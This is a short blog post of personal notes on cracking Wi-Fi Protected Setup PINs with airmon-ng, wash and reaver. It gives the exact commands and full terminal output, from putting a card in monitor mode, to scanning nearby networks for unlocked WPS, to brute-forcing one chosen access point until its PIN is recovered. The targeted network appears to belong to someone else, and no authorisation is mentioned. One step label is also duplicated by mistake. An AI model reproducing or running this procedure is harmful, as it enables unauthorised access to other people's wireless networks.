Wash + Reaver = WPS pwn

Just wanted to write down some notes on WPS cracking

  1. Get our Wifi card ready (alpha N card)
  2. root@ragePwnPi:~# airmon-ng start wlan1
    
    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    1488    ifplugd
    1495    ifplugd
    1989    dhclient
    4091    ifplugd
    Process with PID 4091 (ifplugd) is running on interface wlan1
    
    Interface       Chipset         Driver
    
    wlan1           Atheros AR9271  ath9k - [phy3]
                                    (monitor mode enabled on mon0)
  3. Use wash to find hotspots that are vulnerable
  4. root@ragePwnPi:~# wash -i mon0
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    00:1D:D1:**:**:**       1            -46        1.0               No                H*****
    00:22:3F:**:**:**       1            -47        1.0               No                m*****
    E0:91:F5:**:**:**       2            -56        1.0               No                O*****
    58:6D:8F:**:**:**       3            -69        1.0               No                L*****
    00:24:B2:**:**:**       7            -72        1.0               No                N*****
    A0:21:B7:**:**:**      11            -71        1.0               No                M*****
    00:1D:D2:**:**:**      11            -80        1.0               No                H*****
  5. Use wash to find hotspots that are vulnerable
  6. root@ragePwnPi:~# reaver -i mon0 -b E0:91:F5:**:**:** -vv -c 2
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    
    [+] Switching mon0 to channel 2
    [+] Waiting for beacon from E0:91:F5:**:**:**
    [+] Associated with E0:91:F5:**:**:** (ESSID: O**)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00005678
  7. Eventually, you *should* succeed and see:
[+] Trying pin 32721867
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 7707 seconds
[+] WPS PIN: '32721867'
[+] AP SSID: 'O*****'

Comments are closed